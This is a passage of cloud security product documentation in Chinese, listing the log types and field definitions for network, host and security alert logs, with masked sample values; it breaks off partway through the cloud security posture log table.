全部產品
Search
文件中心

Security Center:日誌類別及欄位說明V2.0

更新時間:Dec 11, 2024

查看Security Center日誌可以幫您及時發現、調查和響應安全事件。購買日誌分析儲存容量後,Security Center會預設開啟安全日誌、部落格、主機日誌,分別記錄系統中的安全事件、網路流量情況和主機的活動。本文介紹Security Center日誌字典V2.0支援的日誌類型以及每種日誌類型的欄位說明。

不同版本支援記錄的日誌類型

Security Center不同版本支援的安全能力不同,可記錄的日誌類型不同。全量購買情境下,根據您購買的Security Center版本記錄支援的日誌類型。非全量購買情境下(支援授權數管理),按照伺服器綁定的版本記錄伺服器中對應的日誌類型。不同版本支援記錄的日誌類型如下:

版本

支援記錄的日誌類型

企業版、旗艦版

Security Center支援的所有日誌類型。

防病毒版、進階版

所有主機日誌和安全日誌。

未綁定授權伺服器

  • 部落格

    說明

    僅支援記錄購買企業版或旗艦版使用者未綁定授權伺服器的部落格。不支援記錄購買防病毒版或進階版使用者未綁定授權伺服器的部落格。

    • Web訪問日誌

    • DNS解析日誌

    • 網路會話日誌

    • 本地DNS日誌

  • 主機日誌

    • 用戶端事件記錄

  • 安全日誌

    • 漏洞日誌(僅記錄免費版支援的漏洞)

    • 安全警示日誌(僅記錄免費版支援的警示)

    • 雲安全態勢管理日誌(僅使用雲安全態勢管理功能後記錄日誌)

    • 應用防護日誌(僅使用應用防護功能後記錄日誌)

    • 惡意檔案檢測日誌(僅使用惡意檔案檢測功能後記錄日誌)

    • 核心檔案監控事件記錄(僅使用核心檔案監控功能後記錄上報的警示事件)

日誌分類

部落格

說明

全球(不含中國)地區不支援查看部落格。

日誌類型

__topic__

描述

採集周期

Web訪問日誌

sas-log-http

記錄使用者請求Web伺服器和Web伺服器響應的日誌,包括HTTP請求的詳細資料,例如使用者IP地址、請求時間、要求方法、請求URL、HTTP狀態代碼、響應大小等。

Web訪問日誌通常用於分析Web流量和使用者行為、識別訪問模式和異常情況、最佳化網站效能等。

資料延遲採集,延遲時間一般為:1~12小時

DNS解析日誌

sas-log-dns

記錄DNS解析過程詳細資料的日誌,包括請求網域名稱、查詢類型、用戶端IP地址、響應值等資訊。

通過分析DNS解析日誌,您可以瞭解DNS解析的請求和響應過程,檢測異常的解析行為、DNS劫持、DNS汙染等問題。

網路會話日誌

sas-log-session

記錄網路連接和資料轉送的日誌,包括網路會話的詳細資料,例如會話開始時間、雙方IP地址、使用的協議和連接埠等。

網路會話日誌通常用於監控網路流量、識別潛在威脅、最佳化網路效能等。

本地DNS日誌

local-dns

記錄在本地DNS伺服器上的DNS查詢和響應的日誌,包括本地DNS請求和響應的詳細資料,例如請求網域名稱、查詢類型、用戶端IP地址、響應值等。

通過本地DNS日誌,您可以瞭解網路中的DNS查詢活動,檢測異常的查詢行為、網域名稱劫持和DNS汙染等問題

主機日誌

日誌類型

__topic__

描述

採集周期

登入流水日誌

aegis-log-login

記錄使用者登入伺服器的日誌,包括登入時間、登入使用者、登入方式、登入IP地址等資訊。

登入流水日誌可以協助您監控使用者的活動,及時識別和響應異常行為,從而保障系統的安全性。

說明

Security Center不支援Windows Server 2008作業系統的登入流水日誌。

即時採集。

網路連接日誌

aegis-log-network

記錄網路連接活動的日誌,包括伺服器串連五元組、連線時間、串連狀態等資訊。

網路連接日誌可以協助您發現異常串連行為,識別潛在的網路攻擊,最佳化網路效能等。

說明
  • 伺服器只收集網路連接從建立到結束過程中的部分狀態。

  • 入向流量不記錄。

即時採集。

進程開機記錄

aegis-log-process

記錄伺服器上進程啟動相關的日誌,包括進程啟動時間、啟動命令、參數等資訊。

通過記錄和分析進程開機記錄,您可以瞭解系統中進程的啟動情況和配置資訊,檢測異常進程活動、惡意軟體入侵和安全威脅等問題。

即時採集,進程啟動立刻上報。

暴力破解日誌

aegis-log-crack

記錄暴力破解行為的日誌,包括嘗試登入及破解系統、應用程式或帳號的資訊。

通過記錄和分析暴力破解日誌,您可以瞭解系統或應用程式受到的暴力破解攻擊,檢測異常的登入嘗試、弱密碼和憑證泄露等問題。暴力破解日誌還可以用於追蹤惡意使用者和取證分析,協助安全團隊進行事件響應和調查工作。

即時採集。

帳號快照日誌

aegis-snapshot-host

記錄系統或應用程式中使用者帳號詳細資料的日誌,包括帳號的基本屬性,例如使用者名稱、密碼原則、登入歷史等。

通過比較不同時間點的帳號快照日誌,您可以瞭解使用者帳號的變化和演變情況,及時檢測潛在的帳號安全問題,例如未授權的帳號訪問、異常的帳號狀態等。

  • 開啟資產指紋自動採集功能時,按照設定的周期自動採集。資產指紋自動採集的更多資訊,請參見資產指紋調查

  • 未開啟資產指紋自動採集功能時,每台伺服器一天非固定時間收集一次。

網路快照日誌

aegis-snapshot-port

記錄網路連接的日誌,包括串連五元組、串連狀態及關聯的進程資訊等欄位。

通過記錄和分析網路連接快照日誌,您可以瞭解系統中活動的網路通訊端情況,協助您發現異常串連行為,識別潛在的網路攻擊,最佳化網路效能等。

進程快照日誌

aegis-snapshot-process

記錄系統中進程活動的日誌,包括進程ID、進程名稱、進程啟動時間等資訊。

通過記錄和分析進程快照日誌,您可以瞭解系統中進程的活動情況、資源佔用情況,檢測異常進程、CPU佔用和記憶體泄露等問題。

DNS請求日誌

aegis-log-dns-query

記錄DNS查詢請求的日誌,包括伺服器發送DNS查詢請求的詳細資料,例如查詢的網域名稱、查詢類型、查詢來源等資訊。

通過分析DNS請求日誌,您可以瞭解網路中的DNS查詢活動,檢測異常的查詢行為、網域名稱劫持和DNS汙染等問題。

說明

針對核心版本低於4.X.X系列的Linux伺服器,Security Center不支援DNS請求日誌的採集及惡意DNS行為的檢測。建議您考慮升級系統核心至更高版本,以此來獲得全面的威脅檢測功能。

即時採集。

用戶端事件記錄

aegis-log-client

記錄Security Center用戶端的上線和離線事件。

即時採集。

安全日誌類型

日誌類型

__topic__

描述

採集周期

漏洞日誌

sas-vul-log

記錄系統或應用程式中發現的漏洞相關資訊的日誌,包括漏洞名稱、漏洞狀態、處理動作等資訊。

通過記錄和分析漏洞日誌,您可以瞭解系統中存在的漏洞情況、安全風險和攻擊趨勢,及時採取相應的補救措施。

即時採集。

基準日誌

sas-hc-log

記錄基準風險檢查結果的日誌,包括基準等級、基準類別、風險等級等資訊。

通過記錄和分析基準風險日誌,您可以瞭解系統的基準安全狀態和潛在的風險。

說明

僅記錄首次出現且未通過的檢查項資料,以及歷史檢測中已通過但重新檢測後未通過的檢查項資料。

安全警示日誌

sas-security-log

記錄系統或應用程式中發生的安全事件和警示資訊的日誌,包括警示資料來源、警示詳情、警示等級等資訊。

通過記錄和分析安全警示日誌,您可以瞭解系統中的安全事件和威脅情況,及時採取相應的響應措施。

雲安全態勢管理日誌

sas-cspm-log

記錄雲安全態勢管理相關的日誌,包括雲安全態勢管理的檢查結果、加白操作等資訊。

通過記錄和分析雲安全態勢管理日誌,您可以瞭解雲平台中存在的配置問題和潛在的安全風險。

網路防禦日誌

sas-net-block

記錄網路攻擊事件的日誌,包括攻擊類型、源IP地址、目標IP地址等關鍵資訊。

通過記錄和分析網路防禦日誌,您可以瞭解網路中發生的安全事件,進而採取相應的響應和防禦措施,提高網路的安全性和可靠性。

應用防護日誌

sas-rasp-log

記錄應用防護功能的攻擊警示資訊的日誌,包括攻擊類型、行為資料、攻擊者IP等關鍵資訊。

通過記錄和分析應用防護警示日誌,您可以瞭解應用程式中發生的安全事件,進而採取相應的響應和防禦措施,提高應用程式的安全性和可靠性。

惡意檔案檢測日誌

sas-filedetect-log

記錄使用惡意檔案檢測SDK功能進行惡意檔案檢測的日誌,包括惡意檔案檢測的檔案資訊、檢測情境、檢測結果等資訊。

通過記錄和分析惡意檔案檢測日誌,您可以識別離線檔案和阿里雲OSS檔案中存在的常見病毒,例如勒索病毒、挖礦程式等,及時處理以防止惡意檔案傳播和執行。

部落格欄位說明

重要

僅Security Center企業版、旗艦版支援部落格。

Web訪問日誌

欄位名

說明

樣本

response_content_length

返回的訊息實體的長度。單位為:Byte。

612

dst_ip

目標主機的IP地址。

39.105.XX.XX

dst_port

目標主機的連接埠。

80

host

訪問的對向主機的IP地址或網域名稱。

39.105.XX.XX

jump_location

重新導向地址。

123

request_method

HTTP請求方式。

GET

http_referer

用戶端向伺服器發送請求時的HTTP referer,告知伺服器訪問來源的HTTP串連。

www.example.com

request_datetime

請求時間。

2024-08-01 06:59:28

status

伺服器對請求的響應狀態代碼。

200

content_type

請求內容類型。

text/plain;charset=utf-8

response_content_type

響應內容類型。

text/plain; charset=utf-8

src_ip

訪問源的IP地址。

31.220.XX.XX

src_port

訪問源的連接埠。

59524

request_uri

請求URI。

/report

http_user_agent

向用戶端發起的請求。

okhttp/3.2.0

http_x_forward_for

HTTP要求標頭欄位,記錄用戶端的真實IP地址。

31.220.XX.XX

DNS解析日誌

欄位名

說明

樣本

additional

DNS伺服器返回的附加資源記錄的資訊,例如CNAME記錄、MX記錄、PTR記錄等。

additional_num

DNS伺服器返回的附加資源記錄的數量。

0

answer

DNS伺服器返回的回答資訊,指示查詢主機的具體解析結果。回答資訊包含了請求網域名稱對應的IP地址或其他相關資訊,例如A記錄、AAAA記錄等。

example.com A IN 52 1.2.XX.XX

answer_num

DNS伺服器返回的回答資訊的數量。

1

authority

DNS伺服器返回的權威記錄資訊,指示負責管理和提供該網域名稱解析的DNS伺服器。權威記錄包含了對請求網域名稱進行授權的DNS伺服器的資訊,例如NS記錄。

NS IN 17597

authority_num

DNS伺服器返回的權威記錄的數量。

1

client_subnet

DNS用戶端的子網路遮罩資訊。

59.152.XX.XX

dst_ip

目的IP。

106.55.XX.XX

dst_port

目的連接埠。

53

net_connect_dir

DNS請求的資料轉送方向,取值:

  • in:進入DNS伺服器的請求。

  • out:DNS伺服器發出的響應。

out

qid

查詢ID。

13551

query_name

DNS解析請求的查詢網域名稱。

example.com

query_type

DNS解析請求的查詢類型。

A

query_datetime

DNS解析請求的時間。

2024-08-01 08:33:58

rcode

DNS伺服器返回的響應代碼,指示DNS解析結果。

0

region

來源地區ID。取值:

  • 1:北京。

  • 2:青島。

  • 3:杭州。

  • 4:上海。

  • 5:深圳。

  • 6:其他。

1

response_datetime

DNS伺服器返迴響應的時間。

2024-08-01 08:31:25

src_ip

源IP地址。

106.11.XX.XX

src_port

源連接埠。

22

網路會話日誌

欄位名

說明

樣本

asset_type

產生日誌的資產。取值:

  • ECS:Elastic Compute Service。

  • SLB:Server Load Balancer。

  • NAT:NAT Gateway。

ECS

dst_ip

目標IP地址。

119.96.XX.XX

dst_port

目標連接埠。

443

net_connect_dir

網路會話的資料轉送方向。固定取值為out。

  • 通訊協定為TCP時,表示從阿里雲內到阿里雲外發起的請求。

  • 通訊協定為UDP時,不代表請求的實際方向,僅供參考。

out

l4_proto

協議類型。取值:

  • tcp

  • udp

tcp

session_time

網路會話的開始時間。

2024-08-01 08:31:18

src_ip

源IP地址。

121.40.XX.XX

src_port

源連接埠。

53602

本地DNS日誌

欄位名

說明

樣本

anwser_name

DNS回答的記錄名稱,表示與資源記錄關聯的網域名稱。

example.com

answer_rdata

DNS回答的RDA(Resource Data Area)欄位,表示解析結果的具體值。

106.11.XX.XX

answer_ttl

DNS回答的TTL(Time to Live)欄位,表示解析結果的存留時間,單位為秒。

600

answer_type

DNS響應的記錄類型,以下是常見的DNS響應類型取值:

  • 1:A記錄。

  • 2:NS記錄。

  • 5:CNAME記錄。

  • 6:SOA記錄。

  • 10:NULL記錄。

  • 12:PTR記錄。

  • 15:MX記錄。

  • 16:TXT記錄。

  • 25:KEY記錄。

  • 28:AAAA記錄。

  • 33:SRV記錄。

  • 41:OPT記錄。

  • 43:DS記錄。

  • 44:SSHFP記錄。

  • 45:IPSECKEY記錄。

  • 46:RRSIG記錄。

  • 47:NSEC記錄。

1

dst_ip

目的IP地址,表示請求發往的IP地址,預設為十進位IP地址格式。

323223****

dst_port

目的連接埠,表示請求發往的連接埠號碼。

53

group_id

分組ID。相同的分組ID表示相同的DNS請求或響應。

3

host

主機名稱。

hostname

id

查詢ID,用於唯一標識DNS請求或響應。

64588

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

internet_ip

DNS請求或響應的公網IP地址。

121.40.XX.XX

ip_ttl

DNS請求或響應中IP資料包的TTL值。

64

query_name

查詢的網域名稱。

example.com

query_type

DNS解析請求的查詢類型。取值:

  • 1:A記錄。

  • 2:NS記錄。

  • 5:CNAME記錄。

  • 6:SOA記錄。

  • 10:NULL記錄。

  • 12:PTR記錄。

  • 15:MX記錄。

  • 16:TXT記錄。

  • 25:KEY記錄。

  • 28:AAAA記錄。

  • 33:SRV記錄。

1

src_ip

發起DNS請求或響應的IP地址,預設為十進位IP地址格式。

168427****

src_port

發起DNS請求或響應的連接埠號碼。

53

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

time_usecond

DNS請求或響應的時間戳記,單位為微秒。

590662

tunnel_id

DNS請求或響應所使用的隧道ID,用於唯一標識一個網路隧道。網路隧道是一種通過不同的網路通訊協定來傳輸資料的方式,可以用於安全訪問互連網或跨越不同網路的通訊。

514763

主機日誌欄位說明

登入流水日誌

欄位名

說明

樣本

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器的IP地址。

192.168.XX.XX

sas_group_name

伺服器在Security Center的資產分組。

default

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

src_ip

登入伺服器的IP地址。

221.11.XX.XX

dst_port

登入伺服器的連接埠。

22

login_type

登入類型。取值包括但不限於:

  • SSHLOGINSSH:SSH登入。

  • RDPLOGIN:遠端桌面登入。

  • IPCLOGIN:IPC串連登入。

SSH

username

登入使用者名稱。

admin

login_count

登入次數。

1分鐘內重複登入會被合并為1條日誌,例如login_count值為3,表示在最近1分鐘內重複登入了3次。

3

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

網路連接日誌

欄位名

說明

樣本

cmd_chain

進程鏈。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

進程鏈索引,可以通過相同索引尋找進程鏈。

B184

container_hostname

容器內伺服器名稱。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

鏡像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

鏡像名稱。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名稱。

nginx-ingress-****

container_pid

容器內進程ID。

0

net_connect_dir

網路連接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

網路連接接收者的IP。

  • dirout時,表示對端主機。

  • dirin時,表示本機。

192.168.XX.XX

dst_port

網路連接接收者的連接埠。

443

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器IP地址。

192.168.XX.XX

parent_proc_name

父進程的檔案名稱。

/usr/bin/bash

pid

進程ID。

14275

ppid

父進程ID。

14268

proc_name

進程名。

nginx

proc_path

進程路徑。

/usr/local/nginx/sbin/nginx

proc_start_time

進程的啟動時間。

N/A

connection_type

協議。取值:

  • tcp

  • udp

  • raw(表示raw socket)。

tcp

sas_group_name

伺服器在Security Center的資產分組。

default

src_ip

源IP地址。

100.127.XX.XX

src_port

源連接埠。

41897

srv_comm

父進程的父進程關聯的命令名。

containerd-shim

status

網路連接狀態。取值:

  • 1:串連已關閉(closed)。

  • 2:正在等待串連請求(listen)。

  • 3:已發送SYN請求(syn send)。

  • 4:已接收SYN請求(syn recv)。

  • 5:串連已建立(established)。

  • 6:等待關閉串連(close wait)。

  • 7:正在關閉串連(closing)。

  • 8:等待對方發送關閉請求(fin_wait1)。

  • 9:等待對方發送關閉請求並確認(fin_wait2)。

  • 10:等待足夠的時間以確保對方收到關閉請求的確認(time_wait)。

  • 11:已刪除傳輸控制塊(delete_tcb)。

5

type

即時網路連接的類型。取值:

  • connect:主動發起TCP connect串連。

  • accept:收到TCP串連。

  • listen:連接埠監聽。

listen

uid

進程使用者的ID。

101

username

進程的使用者名稱。

root

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

進程開機記錄

欄位名

說明

樣本

cmd_chain

進程鏈。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

進程鏈索引,可以通過相同索引尋找進程鏈。

B184

cmd_index

命令列每個參數的索引,每兩個為一組,標識一個參數的起止索引。

0,3,5,8

cmdline

進程啟動的完整命令列。

ipset list KUBE-6-CLUSTER-IP

comm

進程關聯的命令名。

N/A

container_hostname

容器內伺服器名稱。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

鏡像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

鏡像名稱。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名稱。

nginx-ingress-****

container_pid

容器內進程ID。

0

cwd

進程運行目錄。

N/A

proc_name

進程檔案名稱。

ipset

proc_path

進程檔案完整路徑。

/usr/sbin/ipset

gid

進程組的ID。

0

groupname

使用者組。

group1

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器IP地址。

192.168.XX.XX

parent_cmd_line

父進程的命令列。

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

父進程檔案名稱。

kube-proxy

parent_proc_path

父進程檔案完整路徑。

/usr/local/bin/kube-proxy

pid

進程ID。

14275

ppid

父進程ID。

14268

proc_start_time

進程啟動時間。

2024-08-01 16:45:40

parent_proc_start_time

父進程的啟動時間。

2024-07-12 19:45:19

sas_group_name

伺服器在Security Center的資產分組。

default

srv_cmd

祖進程的命令列。

/usr/bin/containerd

tty

登入的終端。N/A表示帳號從未登入過終端。

N/A

uid

使用者ID。

123

username

進程的使用者名稱。

root

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

暴力破解日誌

欄位名

說明

樣本

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

被暴力破解的伺服器IP地址。

192.168.XX.XX

sas_group_name

伺服器在Security Center的資產分組。

default

uuid

被暴力破解的伺服器UUID。

5d83b26b-b7ca-4a0a-9267-12*****

login_count

失敗登入次數。

1分鐘內重複登入會被合并為1條日誌,例如warn_count值為3,表示在最近1分鐘內重複登入了3次。

3

src_ip

登入來源IP地址。

47.92.XX.XX

dst_port

登入連接埠。

22

login_type

登入類型。取值:

  • SSHLOGINSSH:SSH登入。

  • RDPLOGIN:遠端桌面登入。

  • IPCLOGIN:IPC串連登入。

SSH

username

登入使用者名稱。

user

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

帳號快照日誌

欄位名

說明

樣本

account_expire

帳號的到期時間。never表示永不到期。

never

domain

帳號所在的域或目錄服務。N/A表示不屬於任何域。

N/A

groups

帳號所在的分組。N/A表示不屬於任何組。

["nscd"]

home_dir

主目錄,系統中儲存和管理檔案的預設位置。

/Users/abc

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器IP地址。

192.168.XX.XX

last_chg

最後一次修改密碼的日期。

2022-11-29

last_logon

最後一次登入帳號的日期和時間。N/A表示從未登入過。

2023-08-18 09:21:21

login_ip

最後一次登入帳號的遠程IP地址。N/A表示從未登入過。

192.168.XX.XX

passwd_expire

密碼的到期日期。never表示永不到期。

2024-08-24

perm

是否擁有root許可權。取值:

  • 0:沒有root許可權。

  • 1:有root許可權。

0

sas_group_name

伺服器在Security Center的資產分組。

default

shell

Linux的Shell命令。

/sbin/nologin

status

使用者帳號的狀態,取值:

  • 0:帳號已被禁止登入。

  • 1:帳號可以正常登入。

0

tty

登入的終端。N/A表示帳號從未登入過終端。

N/A

username

使用者名稱稱。

nscd

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

warn_time

密碼到期提醒日期。never表示永不提醒。

2024-08-20

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

網路快照日誌

欄位名

說明

樣本

net_connect_dir

網路連接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

網路連接接收者的IP。

  • dirout時,表示對端主機。

  • dirin時,表示本機。

192.168.XX.XX

dst_port

網路連接接收者的連接埠。

443

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器IP地址。

192.168.XX.XX

pid

進程ID。

682

proc_name

進程名。

sshd

connection_type

協議。取值:

  • tcp4:用IPv4協議的TCP串連。

  • tcp6:用IPv6協議的TCP串連。

  • udp4:用IPv4協議的UDP串連。

  • udp6:用IPv6協議的UDP串連。

tcp4

sas_group_name

伺服器在Security Center的資產分組。

default

src_ip

源IP地址。

100.127.XX.XX

src_port

源連接埠。

41897

status

網路連接狀態。取值:

  • 1:串連已關閉(closed)。

  • 2:正在等待串連請求(listen)。

  • 3:已發送SYN請求(syn send)。

  • 4:已接收SYN請求(syn recv)。

  • 5:串連已建立(established)。

  • 6:等待關閉串連(close wait)。

  • 7:正在關閉串連(closing)。

  • 8:等待對方發送關閉請求(fin_wait1)。

  • 9:等待對方發送關閉請求並確認(fin_wait2)。

  • 10:等待足夠的時間以確保對方收到關閉請求的確認(time_wait)。

  • 11:已刪除傳輸控制塊(delete_tcb)。

5

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

進程快照日誌

欄位名

說明

樣本

cmdline

進程啟動的完整命令列。

/usr/local/share/assist-daemon/assist_daemon

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

伺服器IP地址。

192.168.XX.XX

md5

二進位檔案的MD5雜湊值。

說明

超過1 MB的進程檔案不進行MD5計算。

1086e731640751c9802c19a7f53a64f5

proc_name

進程檔案名稱。

assist_daemon

proc_path

進程檔案完整路徑。

/usr/local/share/assist-daemon/assist_daemon

pid

進程ID。

1692

pname

父進程檔案名稱。

systemd

sas_group_name

伺服器在Security Center的資產分組。

default

proc_start_time

進程啟動時間。內建欄位。

2023-08-18 20:00:12

uid

進程使用者的ID。

101

username

進程的使用者名稱。

root

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

DNS請求日誌

欄位名

說明

樣本

domain

DNS請求對應的網域名稱。

example.aliyundoc.com

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

host_ip

發起DNS請求的伺服器IP地址。

192.168.XX.XX

pid

發起DNS請求的進程ID。

3544

ppid

發起DNS請求的父進程ID。

3408

cmd_chain

發起DNS請求的進程鏈。

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

發起DNS請求的命令列。

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

發起DNS請求的進程路徑。

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

伺服器在Security Center的資產分組。

default

time

捕獲DNS請求事件的時間,該時間一般和DNS請求發生時間相同。

2023-08-17 20:05:04

uuid

發起DNS請求的伺服器UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

用戶端事件記錄

欄位名

說明

樣本

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

host_ip

伺服器IP地址。

192.168.XX.XX

agent_version

用戶端版本。

aegis_11_91

last_login

上次登入的時間戳記。單位:毫秒。

1716444387617

platform

作業系統類型。取值:

  • windows

  • linux

linux

region_id

伺服器所在地區ID。

cn-beijing

status

用戶端狀態。取值:

  • online

  • offline

online

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

安全日誌欄位說明

漏洞日誌

欄位名

說明

樣本

vul_alias_name

漏洞別名。

CESA-2023:1335: openssl Security Update

risk_level

風險等級。取值:

  • asap:高

  • later:中

  • nntf:低

later

extend_content

漏洞擴充資訊。

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

internet_ip

資產的公網IP。

39.104.XX.XX

intranet_ip

資產的私網IP。

192.168.XX.XX

instance_name

主機名稱。

hhht-linux-***

vul_name

漏洞名稱。

centos:7:cesa-2023:1335

operation

漏洞的處理動作。取值:

  • new:新增。

  • verify:驗證。

  • fix:修複。

new

status

狀態資訊。取值:

  • 1:未修複。

  • 2:修複失敗。

  • 3:復原失敗。

  • 4:修複中。

  • 5:復原中。

  • 6:驗證中。

  • 7:修複成功。

  • 8:修複成功,待重啟。

  • 9:復原成功。

  • 10:忽略。

  • 11:復原成功,待重啟。

  • 12:已不存在。

  • 13:已失效。

1

tag

漏洞的標籤。取值:

  • oval:Linux軟體漏洞。

  • system:Windows系統漏洞。

  • cms:Web-CMS漏洞。

    說明

    其他類型的漏洞的標籤為隨機字串。

oval

type

漏洞類型。取值:

  • sys:Windows系統漏洞。

  • cve:Linux軟體漏洞。

  • cms:Web-CMS漏洞。

  • emg:緊急漏洞。

sys

uuid

伺服器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

基準日誌

欄位名

說明

樣本

check_item_name

檢查項名稱。

設定密碼修改最小間隔時間

check_item_level

基準的檢查等級。取值:

  • high:高危。

  • medium:中危。

  • low:低危。

medium

check_type

檢查項類型。

身份鑒別

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

risk_level

風險項層級。取值:

  • high:高。

  • medium:中。

  • low:低。

medium

operation

操作資訊。取值:

  • new:新增。

  • verity:驗證。

new

risk_name

風險項名稱。

密碼原則合規檢測

sas_group_name

檢測出當前風險項的伺服器在Security Center的資產分組。

default

status

狀態資訊。取值:

  • 1:未修複。

  • 2:修複失敗。

  • 3:復原失敗。

  • 4:修複中。

  • 5:復原中。

  • 6:驗證中。

  • 7:修複成功。

  • 8:修複成功,待重啟。

  • 9:復原成功。

  • 10:忽略。

  • 11:復原成功,待重啟。

  • 12:已不存在。

  • 13:已失效。

1

sub_type_alias_name

子類型別名(中文)。

國際通用安全最佳實務-Ubuntu 16/18/20/22安全基準檢查

sub_type_name

基準子類型名稱。基準子類型取值請參見基準類型及子類型列表

hc_ubuntu16_cis_rules

type_alias_name

類型別名(中文)。

國際通用安全最佳實務

type_name

基準類型。基準類型取值請參見基準類型及子類型列表

cis

uuid

檢測出當前風險項的伺服器UUID。

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

安全警示日誌

欄位名

說明

樣本

data_source

資料來源。取值:

  • aegis_suspicious_event:主機異常。

  • aegis_suspicious_file_v2:Webshell。

  • aegis_login_log:異常登入。

  • honeypot:雲蜜罐警示事件。

  • object_scan:檔案檢測例外狀況事件。

  • security_event:Security Center例外狀況事件。

  • sas_ak_leak:AK泄露事件。

aegis_login_log

detail

警示詳情。

說明

警示類型不同,detail欄位包含的內容也不同。如果您在查看警示日誌時,對detail欄位中的參數有疑問,您可以通過提交工單聯絡技術支援人員

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"西安市","type":"login_common_account","displayEventName":"ECS非常用帳號登入","status":0}

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

internet_ip

資產的公網IP。

39.104.XX.XX

intranet_ip

資產的私網IP。

192.168.XX.XX

level

警示事件的危險等級。取值:

  • serious:緊急。

  • suspicious:可疑。

  • remind:提醒。

suspicious

name

警示名稱。

異常登入-ECS非常用帳號登入

operation

操作資訊。取值:

  • new:新增。

  • dealing:處理。

  • update:更新。

new

status

警示的狀態。取值:

  • 0:全部。

  • 1:待處理。

  • 2:已忽略。

  • 4:已確認。

  • 8:已標記為誤判。

  • 16:處理中。

  • 32:處理完畢。

  • 64:已經到期。

  • 128:已經刪除。

  • 512:自動攔截中。

  • 513:自動攔截完畢。

1

unique_info

警示的唯一標識。

2536dd765f804916a1fa3b9516b5****

uuid

產生警示的伺服器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

雲安全態勢管理日誌

欄位名

說明

樣本

check_id

檢查項ID。您可以調用ListCheckResult - 查看雲產品中雲平台配置檢查風險項結果詳情介面擷取ID值。

11

check_item_name

檢查項名稱。

回源配置

instance_id

執行個體ID。

i-2zeg4zldn8zypsfg****

instance_name

執行個體名稱。

lsm

instance_result

